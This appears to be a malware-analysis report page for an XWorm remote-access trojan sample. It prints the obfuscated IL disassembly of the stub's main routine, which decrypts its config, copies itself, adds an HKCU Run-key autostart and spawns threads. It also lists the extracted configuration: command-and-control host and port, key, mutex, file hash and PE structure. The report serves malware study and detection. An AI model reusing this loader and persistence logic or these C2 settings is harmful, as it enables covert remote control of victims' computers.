System.Void Stub.4TzbsG5HhPhZv9sflr2UAq3yDlbPOGcSsvpHLUxHNo5DEK3SFKVMB3ZTOPxlqGIhf91BU9m3rosPcb2blwjQ81TGycvHqnf::lGlKNlXWlH1pHIiVjjlWPJQPZw0jltQ2UC9rx()
Main IL Instruction Count

164
Main IL

ldsfld System.Int32 PzhGPjD6X99EJ6DilRB9Hd1iOzBo5fSITYZKh6UhTp1ptrNX81G3npCjGZV4xfCQt3f9py1EmqZ5SWQMzwIUElZmWF9X3v5::ER4Ej1tICp4xFZUmggWxOXyyaPejq5vrtEbtjCdU4FzQHBEweNpjVc6xPYlzcfs2TJuyZaK2XNY87rtDjYfwa0fYYZUtveY ldc.i4 1000 mul.ovf <null> call System.Void System.Threading.Thread::Sleep(System.Int32) ldsfld System.String PzhGPjD6X99EJ6DilRB9Hd1iOzBo5fSITYZKh6UhTp1ptrNX81G3npCjGZV4xfCQt3f9py1EmqZ5SWQMzwIUElZmWF9X3v5::9kDm0dcvilQovMhjkTq6IpFXCUf4F0HuvMm8ydxIZnRKWQC4cHI2TC3XlcEoRLerD2T7ZgdQc3mHeTWhbRaLBmt11aW1L4x call System.Object Stub.OrUQrtouRkXeftYRKNx8MVHWLIo832llM0k9u::4tC8r57NkOZqHUWQGoN1iDPrplurOyiIrCPrp5m2oZDxfpHsTuGfQ2BttNcFCj2nPkP6w(System.String) call System.String Microsoft.VisualBasic.CompilerServices.Conversions::ToString(System.Object) stsfld System.String PzhGPjD6X99EJ6DilRB9Hd1iOzBo5fSITYZKh6UhTp1ptrNX81G3npCjGZV4xfCQt3f9py1EmqZ5SWQMzwIUElZmWF9X3v5::9kDm0dcvilQovMhjkTq6IpFXCUf4F0HuvMm8ydxIZnRKWQC4cHI2TC3XlcEoRLerD2T7ZgdQc3mHeTWhbRaLBmt11aW1L4x ldsfld System.String PzhGPjD6X99EJ6DilRB9Hd1iOzBo5fSITYZKh6UhTp1ptrNX81G3npCjGZV4xfCQt3f9py1EmqZ5SWQMzwIUElZmWF9X3v5::OC2EFcYJ7huRVlx6Omzy1gVOV7LxKPwmXq6U31Uj579hhxWZkmKf915J8L7UABw1z4ygHjnUqSJ5vUW520HSXT70Mzp1vhI call System.Object Stub.OrUQrtouRkXeftYRKNx8MVHWLIo832llM0k9u::4tC8r57NkOZqHUWQGoN1iDPrplurOyiIrCPrp5m2oZDxfpHsTuGfQ2BttNcFCj2nPkP6w(System.String) call System.String Microsoft.VisualBasic.CompilerServices.Conversions::ToString(System.Object) stsfld System.String PzhGPjD6X99EJ6DilRB9Hd1iOzBo5fSITYZKh6UhTp1ptrNX81G3npCjGZV4xfCQt3f9py1EmqZ5SWQMzwIUElZmWF9X3v5::OC2EFcYJ7huRVlx6Omzy1gVOV7LxKPwmXq6U31Uj579hhxWZkmKf915J8L7UABw1z4ygHjnUqSJ5vUW520HSXT70Mzp1vhI ldsfld System.String PzhGPjD6X99EJ6DilRB9Hd1iOzBo5fSITYZKh6UhTp1ptrNX81G3npCjGZV4xfCQt3f9py1EmqZ5SWQMzwIUElZmWF9X3v5::oipLH4fCgOOndxiLx4bZt2e9jTbjCkUxDAT1fjfbiTztvSqlxJvTVbf120shQ20sCHbLPsIwAmFmocZTZCBA5pQzyIoF8aC call System.Object Stub.OrUQrtouRkXeftYRKNx8MVHWLIo832llM0k9u::4tC8r57NkOZqHUWQGoN1iDPrplurOyiIrCPrp5m2oZDxfpHsTuGfQ2BttNcFCj2nPkP6w(System.String) call System.String Microsoft.VisualBasic.CompilerServices.Conversions::ToString(System.Object) stsfld System.String PzhGPjD6X99EJ6DilRB9Hd1iOzBo5fSITYZKh6UhTp1ptrNX81G3npCjGZV4xfCQt3f9py1EmqZ5SWQMzwIUElZmWF9X3v5::oipLH4fCgOOndxiLx4bZt2e9jTbjCkUxDAT1fjfbiTztvSqlxJvTVbf120shQ20sCHbLPsIwAmFmocZTZCBA5pQzyIoF8aC ldsfld System.String PzhGPjD6X99EJ6DilRB9Hd1iOzBo5fSITYZKh6UhTp1ptrNX81G3npCjGZV4xfCQt3f9py1EmqZ5SWQMzwIUElZmWF9X3v5::7QTtZvTYXZfuDYA72tnqMtVThbRmGHNQpRHSrPg4IPgbMJ1pVOQ0Lo92oGiWAZsVqqhHSMYqpS2VTpRhcY4lyDyHxLpfFFg call System.Object Stub.OrUQrtouRkXeftYRKNx8MVHWLIo832llM0k9u::4tC8r57NkOZqHUWQGoN1iDPrplurOyiIrCPrp5m2oZDxfpHsTuGfQ2BttNcFCj2nPkP6w(System.String) call System.String Microsoft.VisualBasic.CompilerServices.Conversions::ToString(System.Object) stsfld System.String PzhGPjD6X99EJ6DilRB9Hd1iOzBo5fSITYZKh6UhTp1ptrNX81G3npCjGZV4xfCQt3f9py1EmqZ5SWQMzwIUElZmWF9X3v5::7QTtZvTYXZfuDYA72tnqMtVThbRmGHNQpRHSrPg4IPgbMJ1pVOQ0Lo92oGiWAZsVqqhHSMYqpS2VTpRhcY4lyDyHxLpfFFg ldsfld System.String PzhGPjD6X99EJ6DilRB9Hd1iOzBo5fSITYZKh6UhTp1ptrNX81G3npCjGZV4xfCQt3f9py1EmqZ5SWQMzwIUElZmWF9X3v5::wvbtfYD5JEP9rjyRAEYh7HP4wmoKQP3EkOQIFEzq7EADJvID2YB7tKTGgziALb94TkYvuyS9uCHavm99MiOc8Wv3kyKf5rc call System.Object Stub.OrUQrtouRkXeftYRKNx8MVHWLIo832llM0k9u::4tC8r57NkOZqHUWQGoN1iDPrplurOyiIrCPrp5m2oZDxfpHsTuGfQ2BttNcFCj2nPkP6w(System.String) call System.String Microsoft.VisualBasic.CompilerServices.Conversions::ToString(System.Object) stsfld System.String PzhGPjD6X99EJ6DilRB9Hd1iOzBo5fSITYZKh6UhTp1ptrNX81G3npCjGZV4xfCQt3f9py1EmqZ5SWQMzwIUElZmWF9X3v5::wvbtfYD5JEP9rjyRAEYh7HP4wmoKQP3EkOQIFEzq7EADJvID2YB7tKTGgziALb94TkYvuyS9uCHavm99MiOc8Wv3kyKf5rc ldsfld System.String PzhGPjD6X99EJ6DilRB9Hd1iOzBo5fSITYZKh6UhTp1ptrNX81G3npCjGZV4xfCQt3f9py1EmqZ5SWQMzwIUElZmWF9X3v5::ZwRX7kWNfFOH1wP7TFeW1hjY1MlAvssghsOQOS5ZeQu0e8ObZy2MLBgG3IPnFabV9pBZjIjDVT5VbjtVSdm8OoGaWrnXFkd call System.Object Stub.OrUQrtouRkXeftYRKNx8MVHWLIo832llM0k9u::4tC8r57NkOZqHUWQGoN1iDPrplurOyiIrCPrp5m2oZDxfpHsTuGfQ2BttNcFCj2nPkP6w(System.String) call System.String Microsoft.VisualBasic.CompilerServices.Conversions::ToString(System.Object) stsfld System.String PzhGPjD6X99EJ6DilRB9Hd1iOzBo5fSITYZKh6UhTp1ptrNX81G3npCjGZV4xfCQt3f9py1EmqZ5SWQMzwIUElZmWF9X3v5::ZwRX7kWNfFOH1wP7TFeW1hjY1MlAvssghsOQOS5ZeQu0e8ObZy2MLBgG3IPnFabV9pBZjIjDVT5VbjtVSdm8OoGaWrnXFkd ldsfld System.String PzhGPjD6X99EJ6DilRB9Hd1iOzBo5fSITYZKh6UhTp1ptrNX81G3npCjGZV4xfCQt3f9py1EmqZ5SWQMzwIUElZmWF9X3v5::o9ysLIZ9nEWz26N70izmHkWBk3lThNplv9TqsD5qPf3nwqD6sRK3umXUgiFSp6Hr0cTM0j5rTMjK3zKLHdVsidbBfNJEQKd call System.Object Stub.OrUQrtouRkXeftYRKNx8MVHWLIo832llM0k9u::4tC8r57NkOZqHUWQGoN1iDPrplurOyiIrCPrp5m2oZDxfpHsTuGfQ2BttNcFCj2nPkP6w(System.String) call System.String Microsoft.VisualBasic.CompilerServices.Conversions::ToString(System.Object) call System.String System.Environment::ExpandEnvironmentVariables(System.String) stsfld System.String PzhGPjD6X99EJ6DilRB9Hd1iOzBo5fSITYZKh6UhTp1ptrNX81G3npCjGZV4xfCQt3f9py1EmqZ5SWQMzwIUElZmWF9X3v5::o9ysLIZ9nEWz26N70izmHkWBk3lThNplv9TqsD5qPf3nwqD6sRK3umXUgiFSp6Hr0cTM0j5rTMjK3zKLHdVsidbBfNJEQKd ldsfld System.String PzhGPjD6X99EJ6DilRB9Hd1iOzBo5fSITYZKh6UhTp1ptrNX81G3npCjGZV4xfCQt3f9py1EmqZ5SWQMzwIUElZmWF9X3v5::nC1bMn7LjT1BEod5TuR9e44yU9c3Ote4bRbyEQm4jjE8f8SuG6cjZQej2hSRNUsH62FnBPh1G4ghOxdR9QY0F9tcODyZozv call System.Object Stub.OrUQrtouRkXeftYRKNx8MVHWLIo832llM0k9u::4tC8r57NkOZqHUWQGoN1iDPrplurOyiIrCPrp5m2oZDxfpHsTuGfQ2BttNcFCj2nPkP6w(System.String) call System.String Microsoft.VisualBasic.CompilerServices.Conversions::ToString(System.Object) stsfld System.String PzhGPjD6X99EJ6DilRB9Hd1iOzBo5fSITYZKh6UhTp1ptrNX81G3npCjGZV4xfCQt3f9py1EmqZ5SWQMzwIUElZmWF9X3v5::nC1bMn7LjT1BEod5TuR9e44yU9c3Ote4bRbyEQm4jjE8f8SuG6cjZQej2hSRNUsH62FnBPh1G4ghOxdR9QY0F9tcODyZozv ldsfld System.String PzhGPjD6X99EJ6DilRB9Hd1iOzBo5fSITYZKh6UhTp1ptrNX81G3npCjGZV4xfCQt3f9py1EmqZ5SWQMzwIUElZmWF9X3v5::E6sFfwbD0rMSsbNH4GxBoW1HWc6lmnU99tVlhWsXTlB7i8YCTqDaGaUbBRxvhG4eoycm2FWcHIcRJDgBAUMFTd8O9VvUi4d call System.Object Stub.OrUQrtouRkXeftYRKNx8MVHWLIo832llM0k9u::4tC8r57NkOZqHUWQGoN1iDPrplurOyiIrCPrp5m2oZDxfpHsTuGfQ2BttNcFCj2nPkP6w(System.String) call System.String Microsoft.VisualBasic.CompilerServices.Conversions::ToString(System.Object) stsfld System.String PzhGPjD6X99EJ6DilRB9Hd1iOzBo5fSITYZKh6UhTp1ptrNX81G3npCjGZV4xfCQt3f9py1EmqZ5SWQMzwIUElZmWF9X3v5::E6sFfwbD0rMSsbNH4GxBoW1HWc6lmnU99tVlhWsXTlB7i8YCTqDaGaUbBRxvhG4eoycm2FWcHIcRJDgBAUMFTd8O9VvUi4d ldsfld System.String PzhGPjD6X99EJ6DilRB9Hd1iOzBo5fSITYZKh6UhTp1ptrNX81G3npCjGZV4xfCQt3f9py1EmqZ5SWQMzwIUElZmWF9X3v5::h4BKb2INWcov2CfJZYRWO5Q4khAc9BXTvkGmtIDvuuIYx8Pc0MCHtCMVDeL3OLp5ZScDU0e93ZWSCO1fgmyqraUYwepHSDa call System.Object Stub.OrUQrtouRkXeftYRKNx8MVHWLIo832llM0k9u::4tC8r57NkOZqHUWQGoN1iDPrplurOyiIrCPrp5m2oZDxfpHsTuGfQ2BttNcFCj2nPkP6w(System.String) call System.String Microsoft.VisualBasic.CompilerServices.Conversions::ToString(System.Object) stsfld System.String PzhGPjD6X99EJ6DilRB9Hd1iOzBo5fSITYZKh6UhTp1ptrNX81G3npCjGZV4xfCQt3f9py1EmqZ5SWQMzwIUElZmWF9X3v5::h4BKb2INWcov2CfJZYRWO5Q4khAc9BXTvkGmtIDvuuIYx8Pc0MCHtCMVDeL3OLp5ZScDU0e93ZWSCO1fgmyqraUYwepHSDa ldsfld System.String PzhGPjD6X99EJ6DilRB9Hd1iOzBo5fSITYZKh6UhTp1ptrNX81G3npCjGZV4xfCQt3f9py1EmqZ5SWQMzwIUElZmWF9X3v5::B42e05YlpSMIplU3oZlp5MZ5oEJcsRUhlZiyUIuoMmLj8K3mJLVi3Bv9Dq4dvGI6ElEkdfv6PXzNcxLginsQyNJ0aiKRJNA call System.Object Stub.OrUQrtouRkXeftYRKNx8MVHWLIo832llM0k9u::4tC8r57NkOZqHUWQGoN1iDPrplurOyiIrCPrp5m2oZDxfpHsTuGfQ2BttNcFCj2nPkP6w(System.String) call System.String Microsoft.VisualBasic.CompilerServices.Conversions::ToString(System.Object) stsfld System.String PzhGPjD6X99EJ6DilRB9Hd1iOzBo5fSITYZKh6UhTp1ptrNX81G3npCjGZV4xfCQt3f9py1EmqZ5SWQMzwIUElZmWF9X3v5::B42e05YlpSMIplU3oZlp5MZ5oEJcsRUhlZiyUIuoMmLj8K3mJLVi3Bv9Dq4dvGI6ElEkdfv6PXzNcxLginsQyNJ0aiKRJNA ldsfld System.String PzhGPjD6X99EJ6DilRB9Hd1iOzBo5fSITYZKh6UhTp1ptrNX81G3npCjGZV4xfCQt3f9py1EmqZ5SWQMzwIUElZmWF9X3v5::lO5dfaaAicF9Yq2nJxX9PENxx9VkiomUv5w0kfxrk17VelAIYLCiYqpAW6xheAAGvoKW5zGB6KqBmhQZ9UpiEOA2ua2Eu74 call System.Object Stub.OrUQrtouRkXeftYRKNx8MVHWLIo832llM0k9u::4tC8r57NkOZqHUWQGoN1iDPrplurOyiIrCPrp5m2oZDxfpHsTuGfQ2BttNcFCj2nPkP6w(System.String) call System.String Microsoft.VisualBasic.CompilerServices.Conversions::ToString(System.Object) stsfld System.String PzhGPjD6X99EJ6DilRB9Hd1iOzBo5fSITYZKh6UhTp1ptrNX81G3npCjGZV4xfCQt3f9py1EmqZ5SWQMzwIUElZmWF9X3v5::lO5dfaaAicF9Yq2nJxX9PENxx9VkiomUv5w0kfxrk17VelAIYLCiYqpAW6xheAAGvoKW5zGB6KqBmhQZ9UpiEOA2ua2Eu74 ldsfld System.String PzhGPjD6X99EJ6DilRB9Hd1iOzBo5fSITYZKh6UhTp1ptrNX81G3npCjGZV4xfCQt3f9py1EmqZ5SWQMzwIUElZmWF9X3v5::zDV1tWz2gAVCLN9avVKFzxrlYZcBSt4VnvKEDdhVurdXQlCLq4hAdMvhSi5ql3C6K8KbE6zRPsHoca9XzY1ltxuhr4fvKQp call System.Object Stub.OrUQrtouRkXeftYRKNx8MVHWLIo832llM0k9u::4tC8r57NkOZqHUWQGoN1iDPrplurOyiIrCPrp5m2oZDxfpHsTuGfQ2BttNcFCj2nPkP6w(System.String) call System.String Microsoft.VisualBasic.CompilerServices.Conversions::ToString(System.Object) stsfld System.String PzhGPjD6X99EJ6DilRB9Hd1iOzBo5fSITYZKh6UhTp1ptrNX81G3npCjGZV4xfCQt3f9py1EmqZ5SWQMzwIUElZmWF9X3v5::zDV1tWz2gAVCLN9avVKFzxrlYZcBSt4VnvKEDdhVurdXQlCLq4hAdMvhSi5ql3C6K8KbE6zRPsHoca9XzY1ltxuhr4fvKQp leave.s IL_012F: call System.Boolean Stub.Y5Jl1AAeZzToLDhbMsZ4tHc5OtjoS7XmGoEtAo8vE6RMg6cavSz5VrwuGczrclYfWluPD::pb5wo3u55kIHmVhBInnRfArdGn4LvA5SJY4oelc5wbdcs92vW6V3n6C6r2znZw7q4RgIO() dup <null> call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::SetProjectError(System.Exception) stloc.3 <null> ldc.i4.0 <null> call System.Void System.Environment::Exit(System.Int32) call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::ClearProjectError() leave.s IL_012F: call System.Boolean Stub.Y5Jl1AAeZzToLDhbMsZ4tHc5OtjoS7XmGoEtAo8vE6RMg6cavSz5VrwuGczrclYfWluPD::pb5wo3u55kIHmVhBInnRfArdGn4LvA5SJY4oelc5wbdcs92vW6V3n6C6r2znZw7q4RgIO() call System.Boolean Stub.Y5Jl1AAeZzToLDhbMsZ4tHc5OtjoS7XmGoEtAo8vE6RMg6cavSz5VrwuGczrclYfWluPD::pb5wo3u55kIHmVhBInnRfArdGn4LvA5SJY4oelc5wbdcs92vW6V3n6C6r2znZw7q4RgIO() brtrue.s IL_013C: call System.Void Stub.4TzbsG5HhPhZv9sflr2UAq3yDlbPOGcSsvpHLUxHNo5DEK3SFKVMB3ZTOPxlqGIhf91BU9m3rosPcb2blwjQ81TGycvHqnf::EleIn09MeBrIgb4zYic7F4UWvNy8yV68lT9Lr() ldc.i4.0 <null> call System.Void System.Environment::Exit(System.Int32) call System.Void Stub.4TzbsG5HhPhZv9sflr2UAq3yDlbPOGcSsvpHLUxHNo5DEK3SFKVMB3ZTOPxlqGIhf91BU9m3rosPcb2blwjQ81TGycvHqnf::EleIn09MeBrIgb4zYic7F4UWvNy8yV68lT9Lr() leave.s IL_0152: call System.Void Stub.4TzbsG5HhPhZv9sflr2UAq3yDlbPOGcSsvpHLUxHNo5DEK3SFKVMB3ZTOPxlqGIhf91BU9m3rosPcb2blwjQ81TGycvHqnf::gRK6kDtck67mvFyuVGVLv7N01OjO6Lj5uotIw() dup <null> call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::SetProjectError(System.Exception) stloc.s V_4 call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::ClearProjectError() leave.s IL_0152: call System.Void Stub.4TzbsG5HhPhZv9sflr2UAq3yDlbPOGcSsvpHLUxHNo5DEK3SFKVMB3ZTOPxlqGIhf91BU9m3rosPcb2blwjQ81TGycvHqnf::gRK6kDtck67mvFyuVGVLv7N01OjO6Lj5uotIw() call System.Void Stub.4TzbsG5HhPhZv9sflr2UAq3yDlbPOGcSsvpHLUxHNo5DEK3SFKVMB3ZTOPxlqGIhf91BU9m3rosPcb2blwjQ81TGycvHqnf::gRK6kDtck67mvFyuVGVLv7N01OjO6Lj5uotIw() ldsfld System.String PzhGPjD6X99EJ6DilRB9Hd1iOzBo5fSITYZKh6UhTp1ptrNX81G3npCjGZV4xfCQt3f9py1EmqZ5SWQMzwIUElZmWF9X3v5::o9ysLIZ9nEWz26N70izmHkWBk3lThNplv9TqsD5qPf3nwqD6sRK3umXUgiFSp6Hr0cTM0j5rTMjK3zKLHdVsidbBfNJEQKd ldstr \ ldsfld System.String PzhGPjD6X99EJ6DilRB9Hd1iOzBo5fSITYZKh6UhTp1ptrNX81G3npCjGZV4xfCQt3f9py1EmqZ5SWQMzwIUElZmWF9X3v5::nC1bMn7LjT1BEod5TuR9e44yU9c3Ote4bRbyEQm4jjE8f8SuG6cjZQej2hSRNUsH62FnBPh1G4ghOxdR9QY0F9tcODyZozv call System.String System.String::Concat(System.String,System.String,System.String) stloc.0 <null> ldloc.0 <null> newobj System.Void System.IO.FileInfo::.ctor(System.String) callvirt System.IO.DirectoryInfo System.IO.FileInfo::get_Directory() callvirt System.String System.IO.DirectoryInfo::get_FullName() stloc.s V_5 ldloc.s V_5 call System.String Microsoft.VisualBasic.CompilerServices.Conversions::ToString(System.Object) call System.Boolean System.IO.Directory::Exists(System.String) brtrue.s IL_0199: ldloc.0 ldloc.s V_5 call System.String Microsoft.VisualBasic.CompilerServices.Conversions::ToString(System.Object) call System.IO.DirectoryInfo System.IO.Directory::CreateDirectory(System.String) pop <null> ldloc.0 <null> call System.Boolean System.IO.File::Exists(System.String) brfalse.s IL_01B0: ldc.i4 1000 ldloc.0 <null> newobj System.Void System.IO.FileInfo::.ctor(System.String) stloc.s V_6 ldloc.s V_6 callvirt System.Void System.IO.FileInfo::Delete() ldc.i4 1000 call System.Void System.Threading.Thread::Sleep(System.Int32) ldloc.0 <null> ldsfld System.String Stub.Y5Jl1AAeZzToLDhbMsZ4tHc5OtjoS7XmGoEtAo8vE6RMg6cavSz5VrwuGczrclYfWluPD::t67BSKtqIOXnXocMIo1P7eUiqjGLHbBOzsxEMufyHeRjytviDDOoWmbHjVhjIpSr6QLYE call System.Byte[] System.IO.File::ReadAllBytes(System.String) call System.Void System.IO.File::WriteAllBytes(System.String,System.Byte[]) leave.s IL_01DB: call My.VekTrXgNw58OgpA8d4Nk3k9Z4ZDvhsglJtnBQgiSilHmvoABmCMMDKfe60tyXxP8gtv95BO7fYWFsxiwgvWYTLI5heu6wtY My.Vn7WFSuMpqo0fL56inO1D4uSO5JzzYEWTCWp0OFuHzGoVUZJgMknG9eXPMyJac1d177K2tJS5Zz2tcjMwOOThbCQVAnNyWf::DGllS7L4u6OqTHtM6Fs9q4TeLO95UDgGxHfLVsI8BxpYyjfShkNGdNGUkKmo7D4gK93PnjPqzUVwKGBs9YO3AmEbZLr9xPU() dup <null> call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::SetProjectError(System.Exception) stloc.s V_7 call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::ClearProjectError() leave.s IL_01DB: call My.VekTrXgNw58OgpA8d4Nk3k9Z4ZDvhsglJtnBQgiSilHmvoABmCMMDKfe60tyXxP8gtv95BO7fYWFsxiwgvWYTLI5heu6wtY My.Vn7WFSuMpqo0fL56inO1D4uSO5JzzYEWTCWp0OFuHzGoVUZJgMknG9eXPMyJac1d177K2tJS5Zz2tcjMwOOThbCQVAnNyWf::DGllS7L4u6OqTHtM6Fs9q4TeLO95UDgGxHfLVsI8BxpYyjfShkNGdNGUkKmo7D4gK93PnjPqzUVwKGBs9YO3AmEbZLr9xPU() call My.VekTrXgNw58OgpA8d4Nk3k9Z4ZDvhsglJtnBQgiSilHmvoABmCMMDKfe60tyXxP8gtv95BO7fYWFsxiwgvWYTLI5heu6wtY My.Vn7WFSuMpqo0fL56inO1D4uSO5JzzYEWTCWp0OFuHzGoVUZJgMknG9eXPMyJac1d177K2tJS5Zz2tcjMwOOThbCQVAnNyWf::DGllS7L4u6OqTHtM6Fs9q4TeLO95UDgGxHfLVsI8BxpYyjfShkNGdNGUkKmo7D4gK93PnjPqzUVwKGBs9YO3AmEbZLr9xPU() callvirt Microsoft.VisualBasic.MyServices.RegistryProxy Microsoft.VisualBasic.Devices.ServerComputer::get_Registry() callvirt Microsoft.Win32.RegistryKey Microsoft.VisualBasic.MyServices.RegistryProxy::get_CurrentUser() ldstr SOFTWARE\Microsoft\Windows\CurrentVersion\Run ldc.i4.1 <null> callvirt Microsoft.Win32.RegistryKey Microsoft.Win32.RegistryKey::OpenSubKey(System.String,System.Boolean) ldsfld System.String PzhGPjD6X99EJ6DilRB9Hd1iOzBo5fSITYZKh6UhTp1ptrNX81G3npCjGZV4xfCQt3f9py1EmqZ5SWQMzwIUElZmWF9X3v5::nC1bMn7LjT1BEod5TuR9e44yU9c3Ote4bRbyEQm4jjE8f8SuG6cjZQej2hSRNUsH62FnBPh1G4ghOxdR9QY0F9tcODyZozv call System.String System.IO.Path::GetFileNameWithoutExtension(System.String) ldloc.0 <null> callvirt System.Void Microsoft.Win32.RegistryKey::SetValue(System.String,System.Object) leave.s IL_0216: call System.Void Stub.Y5Jl1AAeZzToLDhbMsZ4tHc5OtjoS7XmGoEtAo8vE6RMg6cavSz5VrwuGczrclYfWluPD::TRUCY44wIBtWlAmTZXv9uie0TEfqwQrR8Oob1Nv7vBXD3vLrnaFB9xyg2HUmWJzbdd4uP() dup <null> call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::SetProjectError(System.Exception) stloc.s V_8 call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::ClearProjectError() leave.s IL_0216: call System.Void Stub.Y5Jl1AAeZzToLDhbMsZ4tHc5OtjoS7XmGoEtAo8vE6RMg6cavSz5VrwuGczrclYfWluPD::TRUCY44wIBtWlAmTZXv9uie0TEfqwQrR8Oob1Nv7vBXD3vLrnaFB9xyg2HUmWJzbdd4uP() call System.Void Stub.Y5Jl1AAeZzToLDhbMsZ4tHc5OtjoS7XmGoEtAo8vE6RMg6cavSz5VrwuGczrclYfWluPD::TRUCY44wIBtWlAmTZXv9uie0TEfqwQrR8Oob1Nv7vBXD3vLrnaFB9xyg2HUmWJzbdd4uP() ldnull <null> ldftn System.Void Stub.4TzbsG5HhPhZv9sflr2UAq3yDlbPOGcSsvpHLUxHNo5DEK3SFKVMB3ZTOPxlqGIhf91BU9m3rosPcb2blwjQ81TGycvHqnf::bSERuEIx4LoGS2N4owx7FCYhOZF9dMKOSmdef() newobj System.Void System.Threading.ThreadStart::.ctor(System.Object,System.IntPtr) newobj System.Void System.Threading.Thread::.ctor(System.Threading.ThreadStart) callvirt System.Void System.Threading.Thread::Start() ldnull <null> ldftn System.Void Stub.4TzbsG5HhPhZv9sflr2UAq3yDlbPOGcSsvpHLUxHNo5DEK3SFKVMB3ZTOPxlqGIhf91BU9m3rosPcb2blwjQ81TGycvHqnf::oIjOmuxXL2CscGJB8diAvJpTGE6ZeSyIzwfuT() newobj System.Void System.Threading.ThreadStart::.ctor(System.Object,System.IntPtr) newobj System.Void System.Threading.Thread::.ctor(System.Threading.ThreadStart) callvirt System.Void System.Threading.Thread::Start() call System.String Stub.ygrTwjprA3WB8o3n6QhIZAJZtRSDZkUUrNkUa::J5NRYsTdAcOHg731zTdNtjIpD5sHE9PUXxM0P() call System.Boolean Microsoft.VisualBasic.CompilerServices.Conversions::ToBoolean(System.String) brfalse.s IL_0258: call System.Void Stub.4TzbsG5HhPhZv9sflr2UAq3yDlbPOGcSsvpHLUxHNo5DEK3SFKVMB3ZTOPxlqGIhf91BU9m3rosPcb2blwjQ81TGycvHqnf::Ut6lF3SV5jYUPJxCOXVkwbUYF07lTlrERnvsR() call System.Void Stub.YgViWqfb1qmddYsn3NWlJ9reDmNNojlhdoBfm::DXwOHkGFlDFxZTgXlbd9WmhGeR4ac1zAI03aF() call System.Void Stub.4TzbsG5HhPhZv9sflr2UAq3yDlbPOGcSsvpHLUxHNo5DEK3SFKVMB3ZTOPxlqGIhf91BU9m3rosPcb2blwjQ81TGycvHqnf::Ut6lF3SV5jYUPJxCOXVkwbUYF07lTlrERnvsR() ldnull <null> ldftn System.Void Stub.4TzbsG5HhPhZv9sflr2UAq3yDlbPOGcSsvpHLUxHNo5DEK3SFKVMB3ZTOPxlqGIhf91BU9m3rosPcb2blwjQ81TGycvHqnf::A594cDxv0Up1xfMlQDrwTzMCcuACP0owrYaiN() newobj System.Void System.Threading.ThreadStart::.ctor(System.Object,System.IntPtr) newobj System.Void System.Threading.Thread::.ctor(System.Threading.ThreadStart) stloc.1 <null> ldnull <null> ldftn System.Void Stub.4TzbsG5HhPhZv9sflr2UAq3yDlbPOGcSsvpHLUxHNo5DEK3SFKVMB3ZTOPxlqGIhf91BU9m3rosPcb2blwjQ81TGycvHqnf::EFnhamSkxRZi9It340U5wQeLXHBOuJ1qHbiEm() newobj System.Void System.Threading.ThreadStart::.ctor(System.Object,System.IntPtr) newobj System.Void System.Threading.Thread::.ctor(System.Threading.ThreadStart) stloc.2 <null> ldloc.1 <null> callvirt System.Void System.Threading.Thread::Start() ldloc.2 <null> callvirt System.Void System.Threading.Thread::Start() ldloc.2 <null> callvirt System.Void System.Threading.Thread::Join() ret <null>
Artefacts
Name
 Value
Mutex

yrFafqOjWo1AhGTQ
CnC

127.0.0.1
CnC

been-club.gl.at.ply.gg
Port

55790
d418bd5723579f39a928e9a4feb33e81 (68.61 KB)
File Structure
d418bd5723579f39a928e9a4feb33e81
Malicious
Structure
DosHeader
PE Header
Optional Header (x86)
Section Headers
.text
.rsrc
.reloc
Resources
RT_VERSION
ID:0001
ID:0
RT_MANIFEST
ID:0001
ID:0
Characteristics
Malware Configuration - XWorm config.
Config. Field
 Value
Mutex

yrFafqOjWo1AhGTQ
Hosts

127.0.0.1,been-club.gl.at.ply.gg
Port

55790
KEY

<1234567890>
USBNM

<Xwormmm>
LoggerPath

%AppData%
family

xworm
Artefacts
Name
 Value Location
Mutex

yrFafqOjWo1AhGTQ

Malicious

d418bd5723579f39a928e9a4feb33e81
CnC

127.0.0.1

Malicious

d418bd5723579f39a928e9a4feb33e81
CnC

been-club.gl.at.ply.gg

Malicious

d418bd5723579f39a928e9a4feb33e81
Port

55790

Malicious

d418bd5723579f39a928e9a4feb33e81
You must be signed in to post a comment.
An error has occurred. This application may no longer respond until reloaded. Reload 🗙